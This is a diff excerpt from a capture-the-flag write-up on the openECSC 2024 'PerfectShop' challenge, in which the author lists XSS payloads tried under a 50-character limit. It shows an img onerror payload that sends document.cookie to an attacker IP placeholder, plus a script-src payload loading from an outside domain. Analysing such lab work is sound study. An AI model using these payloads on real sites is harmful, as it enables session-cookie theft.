Tiziano-Caruana/writeups/openECSC-2024/PerfectShop/perfect_shop.md

 This step didn't require any rocket science.
 Let's say I simply aimed to find the shortest possible payload with the same philosophy as the previous ones.
 For completeness, I'll add a subsection with the various things I tried during the competition.

 ##### What I Tried During the Competition
-- First of all, I tried several times to exploit [unicode normalization](https://appcheck-ng.com/wp-content/uploads/unicode_normalization.html), with a payload like [`<script src=//ﬀﬀ.pw>`](https://jlajara.gitlab.io/XSS_20_characters), but it seemed useless to me because it wouldn't have allowed me to exfiltrate the cookie (which is absolutely not true, I'll come back to this later) since I wouldn't have been able to append the contents of `document.cookie`, as the use of `src` alone wouldn't have allowed me to execute JavaScript code;
+- First of all, I tried several times to exploit [unicode normalization](https://appcheck-ng.com/wp-content/uploads/unicode_normalization.html), with a payload like [`<script src=//ﬀﬀ.pw>`](https://jlajara.gitlab.io/XSS_20_characters), but it seemed useless to me because it wouldn't have allowed me to exfiltrate the cookie (which is absolutely not true) since I wouldn't have been able to append the contents of `document.cookie`, as the use of `src` alone wouldn't have allowed me to execute JavaScript code;

 - I tried using `onerror` like this: `<img src/onerror=this.src='https://[IP]/'+document.cookie>`, but it still went beyond the allowed 50 characters;